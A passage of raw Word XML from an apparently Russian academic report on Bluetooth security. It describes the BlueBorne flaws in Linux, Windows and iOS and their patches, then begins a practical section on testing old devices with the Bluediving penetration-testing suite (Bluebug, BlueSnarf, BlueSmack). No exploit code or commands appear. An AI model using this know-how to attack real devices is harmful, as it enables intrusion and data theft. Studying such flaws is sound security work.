      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> проблема присутствует в коде функции l2cap_parse_conf_rsp, присутствующей начиная с ядра 3.3 (октябрь 2011 г.). Проблема была устранена 9 сентября</w:t>
      </w:r>
      <w:r w:rsidRPr="00731F50">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2017</w:t>
      </w:r>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. В ядрах </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> со включенной защитой от переполнения стека (CONFIG_CC_STACKPROTECTOR=y) уязвимость приводит только к краху ядра. Подобная защита по умолчанию включена в ядрах RHEL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CentOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fedora</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> и большинства стационарных дистрибутивов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. Поэтому в обычных дистрибутивах возможен лишь вызов краха, а основная опасность угрожает мобильным </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">-платформам, таким как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tizen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490D1B">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRDefault="00DC0109" w:rsidP="00DC0109">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc503991012"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00401C88">
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00401C88">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRPr="00DC0109" w:rsidRDefault="00DC0109" w:rsidP="00DC0109">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Man-in-The-Middle (CVE-2017-8628)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRDefault="00DC0109" w:rsidP="00DC0109">
      <w:r w:rsidRPr="00DC0109">
        <w:t xml:space="preserve">Эта уязвимость идентична той, которая обнаружена в операционной системе </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0109">
        <w:t xml:space="preserve">, и влияет на обе системы, поскольку они используют одни и те же принципы в реализации некоторых протоколов </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0109">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRPr="00DC0109" w:rsidRDefault="00DC0109" w:rsidP="00DC0109">
      <w:r w:rsidRPr="00DC0109">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">«Компания </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t>Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t xml:space="preserve"> выпустила обновления для системы безопасности в июле. Клиенты, у которых включен Центр обновления </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t xml:space="preserve"> и применены обновления безопасности, были защищены автоматически. Мы выпустили обновление как можно скорее, но как ответственный отраслевой партнер, не раскрывали информацию, пока другие производители не разработали </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t>патчи</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t xml:space="preserve">», — отметил представитель </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t>Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRPr="00DC0109" w:rsidRDefault="00DC0109" w:rsidP="00DC0109">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc503991013"/>
      <w:r w:rsidRPr="00731F50">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.1.1.4</w:t>
      </w:r>
      <w:r w:rsidR="004B24AA">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRPr="00DC0109" w:rsidRDefault="00DC0109" w:rsidP="00490D1B">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Armis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскрыл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> сведения об этой атаке. Эксплойт был устранён в версии IOS 10 и версии </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> TV выше 7.2.2, однако эта уязвимость по-прежнему представляет большой риск для любого </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-устройства до версии 10. Уязвимость может быть использована злоумышленником для выполнения кода с повышенными привилегиями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRPr="00DC0109" w:rsidRDefault="00DC0109" w:rsidP="00490D1B">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Удаленное выполнение кода с помощью протокола </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Energy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Audio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DC0109" w:rsidRPr="009F7D7F" w:rsidRDefault="00DC0109" w:rsidP="00DC0109">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Эта уязвимость была обнаружена в новом протоколе LEAP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>energy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>audio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">), разработанном </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> и работающим поверх </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. Протокол предназначен для потоковой передачи звука на периферийные устройства, например, гарнитуры или </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Siri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0109">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Поскольку аудио-команды, отправленные с помощью LEAP, проверены не должным образом, злоумышленник может использовать повреждение памяти, чтобы получить полный контроль над устройством.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B335BA" w:rsidRDefault="00731752" w:rsidP="00012BBF">
      <w:pPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B335BA">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B335BA" w:rsidRDefault="00B335BA" w:rsidP="00B335BA">
      <w:pPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B335BA" w:rsidRDefault="00685E0E" w:rsidP="00B335BA">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc503991014"/>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="00B335BA">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ПРАКТИЧЕСКАЯ ЧАСТЬ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="003C1FBB" w:rsidRPr="00012F72" w:rsidRDefault="00685E0E" w:rsidP="00012F72">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc503991015"/>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Реализация у</w:t>
      </w:r>
      <w:r w:rsidR="003C1FBB">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>язвимост</w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ей</w:t>
      </w:r>
      <w:r w:rsidR="003C1FBB">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> старых </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidR="00012F72" w:rsidRPr="003C1FBB">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C1FBB">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">устройств </w:t>
      </w:r>
      <w:r w:rsidR="00D66195">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00390FED">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Утилита </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D66195">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluediving</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D66195" w:rsidRPr="00012F72">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00D66195" w:rsidRDefault="00D66195" w:rsidP="00D66195">
      <w:r>
        <w:t xml:space="preserve">Используя программу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>Bluediving</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>были проверены некоторые уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D66195" w:rsidRDefault="00D66195" w:rsidP="00D66195">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>Bluediving</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve"> - это набор для тестирования проникновения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve">. Он реализует такие атаки, как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>Bluebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>BlueSnarf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>BlueSnarf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve"> ++ и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>BlueSmack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve">, имеет такие функции, как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>спуфинг</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve"> по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve">-адресам, AT и оболочку сокета RFCOMM, и реализует такие инструменты, как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>carwhisperer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve">, BSS, генератор пакетов L2CAP, сброс соединения L2CAP, сканер RFCOMM и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D66195">
        <w:t>greenplaque</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D66195">
        <w:t xml:space="preserve"> режим сканирования (с использованием более одного HCI-устройства).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F208C0" w:rsidRDefault="00F208C0" w:rsidP="00F208C0">
      <w:r>
        <w:t xml:space="preserve">Атака </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BlueSnarfing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ориентируясь на несколько популярных телефонов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nokia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ericsson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, использует недостатки, когда телефоны отображают профиль RFCOMM</w:t>
      </w:r>
      <w:r w:rsidR="00F6140E" w:rsidRPr="00F208C0">
        <w:t>( </w:t>
      </w:r>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Протокол</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
